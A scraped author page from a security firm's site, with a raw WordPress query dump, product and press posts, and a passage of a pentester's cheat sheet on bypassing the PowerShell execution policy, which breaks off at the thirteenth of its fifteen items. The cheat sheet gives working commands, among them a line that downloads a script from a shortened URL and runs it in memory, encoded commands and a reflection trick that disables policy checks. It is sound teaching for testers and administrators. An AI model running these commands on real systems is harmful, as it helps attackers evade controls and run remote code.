Scott Sutherland

Scott is Vice President of Research at NetSPI. In that role, he helps grow the execution team and services while performing research and development of testing tools, techniques, and methodologies used during engagements. Over sixteen years, Scott has had the opportunity provide security services to small and large organizations (Fortune 5) across many industry verticals, but his focus has always been on identifying critical client needs and designing service delivery models to help meet them. Scott has also been an active participant in the information security community and has contributed multiple open-source tools, technical security blog posts, whitepapers, and presentations.

Below are links to some of his published material:

Presentations
https://www.slideshare.net/nullbind

Recent Open-Source Projects
https://github.com/NetSPI/PowerUpSQL
https://github.com/NetSPI/Powerhuntshares
https://github.com/NetSPI/Powerhunt
More by Scott Sutherland
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "17"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "17"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
			SELECT   wp_posts.*
			FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
			WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{759469cf46799d5f7383001efa5d2a13805014e50003103c26526e36737207e0}\"17\"{759469cf46799d5f7383001efa5d2a13805014e50003103c26526e36737207e0}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{759469cf46799d5f7383001efa5d2a13805014e50003103c26526e36737207e0}\"17\"{759469cf46799d5f7383001efa5d2a13805014e50003103c26526e36737207e0}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
			GROUP BY wp_posts.ID
			ORDER BY wp_posts.post_date DESC
			
		
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 29689
                    [post_author] => 53
                    [post_date] => 2023-03-07 13:01:26
                    [post_date_gmt] => 2023-03-07 19:01:26
                    [post_content] => 




Watch Now

Many companies test to see if malicious actors can gain access into their environment or steal their valuable information, however, most security professionals don’t know if they would be able to detect adversaries once they are already inside. In fact, only 20% of common attack behaviors are caught by out-of-the-box EDR, MSSP and SEIM solutions.

Enjoy a conversation with Scott Southerland, NetSPI's Vice President of Research, and SANS Institute's John Pescatore for a discussion on how Breach and Attack Simulation (BAS) is a critical piece of security team success at any organization.

You’ll gain valuable insights into:

  • Key BAS market trends.
  • Critical discoveries from years of testing.
  • Noteworthy feedback from security team leaders.

Finally, you will learn how these findings have impacted the development of NetSPI’s latest Breach and Attack Simulation updates, which launched earlier this year, empowering security professionals to efficiently evaluate their detective controls, educate their SOC teams, and execute on actionable intelligence!

[wonderplugin_video iframe="https://youtu.be/6Oy7FTX2WsQ" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Breach and Attack Simulation & Security Team Success [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => breach-and-attack-simulation-security-team-success [to_ping] => [pinged] => [post_modified] => 2023-03-28 12:55:34 [post_modified_gmt] => 2023-03-28 17:55:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=29689 [menu_order] => 3 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 29338 [post_author] => 17 [post_date] => 2023-02-07 09:00:00 [post_date_gmt] => 2023-02-07 15:00:00 [post_content] =>

NetSPI prides itself on maintaining a leadership position in the global offensive security space by listening to client feedback, analyzing industry trends, and investing in breakthrough technology developments.

Over the last few months, our development teams have been busy, and are excited to introduce a variety of new features and capabilities across our Breach and Attack Simulation, Attack Surface Management, and Penetration Testing as a Service (PTaaS) solutions to help organizations improve security posture, streamline remediation, and protect themselves from adversaries.

Of the releases across our solutions portfolio, Breach and Attack Simulation (BAS) received the most significant updates, so let's start there.

Breach and Attack Simulation (BAS) 

NetSPI BAS data shows that only 20% of common attack behaviors are detected by traditional EDR, SIEM, and MSSP solutions. Although most companies spend thousands, even millions, of dollars on detective controls, very few test to validate if they work and provide the value they claim to.

NetSPI’s Breach and Attack Simulation is designed to evaluate detective control effectiveness and educate security operations teams around common TTPs across the cyber kill chain. After many invaluable feedback sessions with NetSPI clients and hours of market research, we are excited to unveil major updates to our Breach and Attack Simulation platform, dialing in on three core dashboards: the Workspace, Timeline, and Heat Map dashboards.

Workspace 

The Workspace is where red teams, purple teams, security engineers, and analysts will spend a majority of their time. Here, they can build, configure and run customized procedures to test their detective controls. Key features within the Workspace include:

  • Utilize preconfigured procedures – or customize your own – to put detective controls to the test 
  • Visualize security posture and identify gaps using detailed summary charts that update in real time. These can be saved and downloaded to easily share with SOC teams and executive leadership to highlight gaps and justify budget for new staff and technology. 
  • While in the Workspace, users can also learn about each detection phase (logged, detected, alerted, responded, and prevented) for common TTPs within the Mitre ATT&CK framework – down to the individual procedure level.  
  • The Activity Log feature allows security teams to ditch the spreadsheets, wiki pages, and notepads they currently use to track information around their detective control capabilities and centralize this information from a summary viewpoint down to the findings level, allowing streamlined communication and remediation. It will also automatically log play execution and visibility state changes. 
  • Tags allow security teams to see the number of malware and threat actors that use the specific technique, helping prioritize resources and remediation efforts. Tags can also be leveraged to generate custom playbooks that include procedures used by unique threat actors, allowing security teams to measure their resiliency to specific threats quickly and easily. 
  • Export test results in JSON or CSV, allowing the SOC team to plug information into existing business processes and products, or develop customized metrics. 

In summary, the Workspace is designed to educate and enable security teams to understand common attack procedures, how to detect them, and provide resources where they can learn more. 

Timeline 

While the Workspace shows a lot of great information, it focuses on a single point in time. The Timeline dashboard, however, allows you to measure detective controls over time.

This allows security teams to prove the value of investments in people, processes or technology. The Timeline Dashboard will also show where things have improved, stayed the same, or gotten worse at any stage of the Mitre ATT&CK kill chain.

While many competitive BAS offerings will show what is being Alerted on, a unique differentiator for NetSPI is the ability to filter results and show changes in what is logged, detected, alerted, responded, and prevented. These changes can be shown as a percentage (i.e. Logging improved 5 percent) or a count (i.e. Logging improved within two different procedures). Similarly to the Workspace, these charts can be downloaded and easily inserted into presentations, emails, or other reports as needed.

For additional information on how NetSPI defines logging, detection, alerting, response, and prevention, read How to Paint a Comprehensive Threat Detection Landscape

Heat Map

Security teams often refer to the Mitre ATT&CK framework, which shows the phases, tactics, or techniques of common TTPs and procedures seen in the wild. We know that many teams prefer seeing results in this framework, and as such, have built it into our Breach and Attack Simulation platform. BAS delivers a familiar way to interact with the data, while still connecting to the workspace created for detection engineers and other security team members.

As mentioned in the Timeline dashboard, a key differentiator is that we show the different visibility levels (logged, detected, alerted, responded, and prevented) within the Mitre ATT&CK framework coverage within each phase of the cyber kill chain and even down to each specific technique.

Here, we also have the ability to dig in and show all of the procedures that are supported within each technique category. These are then cross-linked back to the Workspace, to streamline remediation and re-testing of specific coverage gaps.

This is a quick summary of a few new features and benefits included in our updated Breach and Attack Simulation solution. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Attack Surface Management (ASM) 

Attack Surface Management continues to be a major focus and growing technology within the cybersecurity industry. NetSPI’s most recent ASM updates focus on organizing, filtering, and expanding on information that was previously included, but will now be even easier to locate and pull actionable information from.  

Three key new feature highlights from last quarter include Vulnerability Triggers, Certificate Transparency Logs, and the Subdomain Facet within our domain explore page.

Vulnerability Triggers

First off, what is a vulnerability? Vulnerabilities consist of any exploits of significant risk identified on your attack surface, which are found by combining both assets and exposures. Although a specific asset or exposure might not be very impactful, when combined into a series of steps it can result in a much greater risk.

With the recent introduction of Vulnerability Triggers, admins can now query assets and exposures for specific criteria based on preconfigured or customized search results, and alert on the ones that are the most concerning to you or your company. These Vulnerability Triggers can now be customized to search for criteria related to Domains, IPs, or Ports.

Long story short, Vulnerability triggers allow your company to not only search for common assets, exploits and vulnerabilities, but also key areas of concern for your executive team, industry, organization, or project.

Certificate Transparency Logs & Subdomain Facet

The next two new features are focused on root domain and subdomain discovery.

NetSPI’s ASM has searched root domains and subdomains since its creation, however we are proud to officially introduce Certificate Transparency Logs! We now ingest certificate transparency logs from public data sources, allowing us to significantly increase domain discovery.

We are also excited to announce the release of our Subdomain Facet within our domain explore page. It is common for companies to have tens, or even hundreds, of subdomains on their attack surface, however with the Subdomain Facet within our domains explore page, you will now be able to filter the common subdomains on your attack surface.

A great use case example of this is to discover development subdomains (dev.netspi.com, stage.netspi.com, or prod.netspi.com, etc.) where sensitive projects or intellectual property might be located, and unintentionally exposed externally.

Another common use case for these types of features could be to detect sub domains that have been hijacked by malicious adversaries in an attempt to steal sensitive customer or employee information.

This is a quick summary of a few new features and benefits included in our Attack Surface Management offering, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Penetration Testing as a Service (Resolve™) 

NetSPI’s Resolve, our penetration testing as a service (PTaaS) platform, has been an industry leader for years, allowing users to visualize their test results and streamline remediation by up to 40%. This product would not be able to remain a leader without continued updates from our product development teams.

Recently, we have been focused on delivering updates to enhance the user experience and make data within the platform to be more accessible and easily leveraged within other security team processes and platforms.

AND/OR Logic

Previously, when users created filters in the grid, AND Logic, as well as OR Logic could be used on filtered search results. We are excited to introduce AND/OR Logic to filters, allowing users to combine both AND Logic and OR Logic to deliver more detailed results to their security teams or business leaders.

Automated Instance State Workflow

Finally, we have introduced automated instance state workflows to include bulk edits. Previously, this was only applicable while updating individual instance states. This change improves efficiencies within the Resolve platform for entire vulnerability management teams.

This is a quick summary of a few new features and benefits included in our PTaaS solution, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).


Read past solutions update blogs: 

[post_title] => NetSPI Offensive Security Solutions Updates: Q1 2023 [post_excerpt] => Learn how NetSPI’s updates to Penetration Testing as a Service (PTaaS), Attack Surface Management, and Breach and Attack Simulation can help you better secure your environment. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => offensive-security-updates-q1-2023 [to_ping] => [pinged] => [post_modified] => 2023-02-06 14:29:04 [post_modified_gmt] => 2023-02-06 20:29:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29338 [menu_order] => 20 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 29342 [post_author] => 17 [post_date] => 2023-01-31 09:00:00 [post_date_gmt] => 2023-01-31 15:00:00 [post_content] =>

On January 31, NetSPI Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | Cyberinsurance – Cyberinsurance emerged into the mainstream in 2020. In 2021 it found its sums were wrong over ransomware and it had to increase premiums dramatically. In 2022, Russia invaded Ukraine with the potential for more serious and more costly global nation state cyberattacks – and Lloyds of London announced a stronger and more clear war exclusions clause. 

Higher premiums and wider exclusions are the primary methods for insurance to balance its books – and it is already having to use both. The question for 2023 and beyond is whether the cyberinsurance industry can make a profit without destroying its market. But one thing is certain: a mainstream, funds rich business like insurance will not easily relinquish a market from which it can profit.

It has a third tool, which has not yet been fully unleashed: prerequisites for cover.

The Lloyd’s war exclusion clause and other difficulties

The Lloyd’s exclusion clause dates to the NotPetya incident of 2017. In some cases, insurers refused to pay out on related claims. Josephine Wolff, an associate professor of cybersecurity policy at Fletcher, Tufts, has written a history of cyberinsurance titled Cyberinsurance Policy: Rethinking Risk in an Age of Ransomware, Computer Fraud, Data Breaches, and Cyberattacks.

“Merck and Mondelez, sued their insurers for denying claims related to the attack on the grounds that it was excluded from coverage as a hostile or warlike action because it was perpetrated by a national government,” she explains. However, an initial ruling in late 2021, unsealed in January 2022, indicated that if insurers wanted to exclude state-sponsored attacks from their coverage they must write exclusions stating that explicitly, rather than relying on boilerplate war exclusions. Merck was granted summary judgment on its claim for $1.4 billion.

The Russia/Ukraine kinetic war has caused a massively increased expectation of nation state-inspired cyberattacks against Europe, the US, NATO, and other west-leaning nations. Lloyds rapidly responded with an expanded, but cyberinsurance-centric, war exclusion clause excluding state-sponsored cyberattacks that will kick in from March 2023. 

Insurers’ response

2023 is a watershed moment for cyberinsurance. It will not abandon what promises to be a massive market – but clearly it cannot continue with its makeshift approach of simply increasing both premiums and exclusions to balance the books indefinitely.

Nevertheless, the expansion of ‘prerequisites’ would be a major – and probably inevitable – evolution in the development of cyberinsurance. Cyberinsurance began as a relatively simple gap-filler. The industry recognized that standard business insurance didn’t explicitly cover against cyber risks, and cyberinsurance evolved to fill that gap. In the beginning, there was no intention to impose cybersecurity conditions on the insured, beyond perhaps a few non-specific basics such as having MFA installed.

But now, comments Scott Sutherland, VP of research at NetSPI, “Insurance company security testing standards will evolve.” It’s been done before, and PCIDSS is the classic example. The payment card industry, explains Sutherland, “observed the personal/business risk associated with insufficient security controls and the key stakeholders combined forces to build policies, standards, and testing procedures that could help reduce that risk in a manageable way for their respective industries.”

He continued, “My guess and hope for 2023, is that the major cyber insurance companies start talking about developing a unified standard for qualifying for cyber insurance. Hopefully, that will bring more qualified security testers into that market which can help drive down the price of assessments and reduce the guesswork/risk being taken on by the cyber insurance companies. While there are undoubtedly more cyber insurance companies than card brands, I think it would work in the best interest of the major players to start serious discussions around the issue and potential solutions.”

There is no silver bullet for cybersecurity. Breaches will continue and will continue to rise in cost and severity – and the insurance industry will continue to balance its books through increasing premiums, exclusions, and insurance refusals. The best that can be hoped for from insurers increasing security requirements is that, as Norman Kromberg, CISO at NetSPI suggests, “Cyber Insurance will become a leading driver for investment in security and IT controls.”

You can read the full article at Security Week!

[post_title] => SecurityWeek: Cyber Insights 2023: Cyberinsurance [post_excerpt] => NetSPI Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-cyber-insights-2023-cyberinsurance [to_ping] => [pinged] => [post_modified] => 2023-02-07 16:12:38 [post_modified_gmt] => 2023-02-07 22:12:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29342 [menu_order] => 26 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 29189 [post_author] => 17 [post_date] => 2023-01-11 09:00:00 [post_date_gmt] => 2023-01-11 15:00:00 [post_content] =>

On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. Read the preview below or view it online.

+++

The increase in the number of attack surfaces along with the rise in cybercriminal sophistication is generating technical debt for security operations centers (SOCs), many of which are understaffed and unable to dedicate time to effectively manage the growing number of security tools in their environment.

Yet, regardless of these challenges, SOC teams are tasked to continuously evolve and adapt to defend against emerging, sophisticated threats.

There are several major players in the BAS market that promise continuous automated security control validation. Many can replicate specific attacker behavior and integrate with your telemetry stack to verify that the behavior was observed, generated an alert, and was blocked.

But as the BAS market continues to evolve, there’s also an opportunity to address shortcomings. In the new year, we expect to see several incremental improvements to BAS solutions, with these four themes leading the charge.

More Streamlined Product Deployment to Reduce Costs

Many fully automated security control validation solutions include hidden costs. First, they require up-front configuration for their on-site deployments, which may also require customizations to ensure everything works properly with the integrations. Additionally, BAS solutions need to be proactively maintained, and for enterprise environments this often requires dedicated staff.

As a result, we’ll see BAS vendors work harder to streamline their product deployments to help reduce the overhead cost for their customers through methods such as providing more SaaS-based offerings.

You can read the full article at Help Net Security!

[post_title] => Help Net Security: 4 Key Shifts in the Breach and Attack Simulation (BAS) Market [post_excerpt] => On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 4-key-shifts-in-the-breach-and-attack-simulation-bas-market [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:55 [post_modified_gmt] => 2023-01-23 21:09:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29189 [menu_order] => 35 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 29117 [post_author] => 17 [post_date] => 2022-12-29 09:00:00 [post_date_gmt] => 2022-12-29 15:00:00 [post_content] =>

On December 29, NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DTL Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DTL) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

[post_title] => Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain [post_excerpt] => NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enterprise-security-tech-2023-cybersecurity-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:57 [post_modified_gmt] => 2023-01-23 21:09:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29117 [menu_order] => 41 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 1107 [post_author] => 17 [post_date] => 2022-12-16 13:21:46 [post_date_gmt] => 2022-12-16 19:21:46 [post_content] =>

By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn't have to be. In this blog I'll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I'm sure there are many techniques that I've missed (or simply don't know about), but hopefully this cheat sheet will offer a good start for those who need it.

What is the PowerShell Execution Policy?

The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the system. By default it is set to "Restricted", which basically means none. However, it's important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That's why there are so many options for working around it. Including a few that Microsoft has provided. For more information on the execution policy settings and other default security controls in PowerShell I suggest reading Carlos Perez's blog. He provides a nice overview.

Why Would I Want to Bypass the Execution Policy?

Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:

  • Native to Windows
  • Able to call the Windows API
  • Able to run commands without writing to the disk
  • Able to avoid detection by Anti-virus
  • Already flagged as "trusted" by most application white list solutions
  • A medium used to write many open source pentest toolkits

How to View the Execution Policy

Before being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the "Restricted" execution policy. You can take a look at the current configuration with the "Get-ExectionPolicy" PowerShell command. If you're looking at the setting for the first time it's likely set to "Restricted" as shown below.

PS C:> Get-ExecutionPolicy
Administrator: Windows Powershell

It's also worth noting that the execution policy can be set at different levels on the system. To view a list of them use the command below. For more information you can check out Microsoft's "Set-ExecutionPolicy" page here.

Get-ExecutionPolicy -List | Format-Table -AutoSize
Powershell Bypass - ExecutionPolicy

Lab Setup Notes

In the examples below I will use a script named runme.ps1 that contains the following PowerShell command to write a message to the console:

Write-Host "My voice is my passport, verify me."

When I attempt to execute it on a system configured with the default execution policy I get the following error: Powershell Bypass - Set-ExecutionPolicy Restricted

If your current policy is too open and you want to make it more restrictive to test the techniques below, then run the command "Set-ExecutionPolicy Restricted" from an administrator PowerShell console. Ok - enough of my babbling - below are 15 ways to bypass the PowerShell execution policy restrictions.

Bypassing the PowerShell Execution Policy

1. Paste the Script into an Interactive PowerShell Console

Copy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that you will be limited by your current user's privileges. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.

Interactive PowerShell Console

2. Echo the Script and Pipe it to PowerShell Standard In

Simply ECHO your script into PowerShell standard input. This technique does not result in a configuration change or require writing to disk.

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
Powershell Bypass - Script Echo

3. Read Script from a File and Pipe to PowerShell Standard In

Use the Windows "type" command or PowerShell "Get-Content" command to read your script from the disk and pipe it into PowerShell standard input. This technique does not result in a configuration change, but does require writing your script to disk. However, you could read it from a network share if you're trying to avoid writing to the disk.

Example 1: Get-Content PowerShell command

Get-Content .runme.ps1 | PowerShell.exe -noprofile -

Powershell Bypass - Get-Content Command

Example 2: Type command

TYPE .runme.ps1 | PowerShell.exe -noprofile -
Powershell Bypass - Type command

4. Download Script from URL and Execute with Invoke Expression

This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn't result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"
Powershell Bypass - Execute with Invoke Expression

5. Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. It's nice for simple script execution, but more complex scripts usually end up with parsing errors. This technique does not result in a configuration change or require writing to disk.

Example 1: Full command

Powershell -command "Write-Host 'My voice is my passport, verify me.'"

Powershell Bypass - Command Switch

Example 2: Short command

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

It may also be worth noting that you can place these types of PowerShell commands into batch files and place them into autorun locations (like the all users startup folder) to help during privilege escalation.

6. Use the EncodeCommand Switch

This is very similar to the "Command" switch, but all scripts are provided as a Unicode/base64 encoded string. Encoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the "Command" switch. This technique does not result in a configuration change or require writing to disk. The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long.

Example 1: Full command

$command = "Write-Host 'My voice is my passport, verify me.'" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -EncodedCommand $encodedCommand
Powershell Bypass - EncodeCommand Switch

Example 2: Short command using encoded string

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

7. Use the Invoke-Command Command

This is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive PowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute commands against remote systems where PowerShell remoting has been enabled. This technique does not result in a configuration change or require writing to disk.

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
Powershell Bypass - Invoke-Command Command

Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. Use the Invoke-Expression Command

This is another one that's typically executed through an interactive PowerShell console or one liner using the "Command" switch. This technique does not result in a configuration change or require writing to disk. Below I've listed are a few common ways to use Invoke-Expression to bypass the execution policy.

Example 1: Full command using Get-Content

Get-Content .runme.ps1 | Invoke-Expression
Powershell Bypass - Invoke-Expression Command

Example 2: Short command using Get-Content

GC .runme.ps1 | iex

9. Use the "Bypass" Execution Policy Flag

This is a nice flag added by Microsoft that will bypass the execution policy when you're executing scripts from a file. When this flag is used Microsoft states that "Nothing is blocked and there are no warnings or prompts". This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
ExecutionPolicy Bypass

10. Use the "Unrestricted" Execution Policy Flag

This similar to the "Bypass" flag. However, when this flag is used Microsoft states that it "Loads all configuration files and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs." This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
Powershell Bypass - Swap out the AuthorizationManager

11. Use the "Remote-Signed" Execution Policy Flag

Create your script then follow the tutorial written by Carlos Perez to sign it. Finally,run it using the command below:

PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

This is one of the more creative approaches. The function below can be executed via an interactive PowerShell console or by using the "command" switch. Once the function is called it will swap out the "AuthorizationManager" with null. As a result, the execution policy is essentially set to unrestricted for the remainder of the session. This technique does not result in a persistant configuration change or require writing to disk. However, it the change will be applied for the duration of the session.

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} 

Disable-ExecutionPolicy  .runme.ps1
Powershell Bypass - Process Scope

13. Set the ExcutionPolicy for the Process Scope

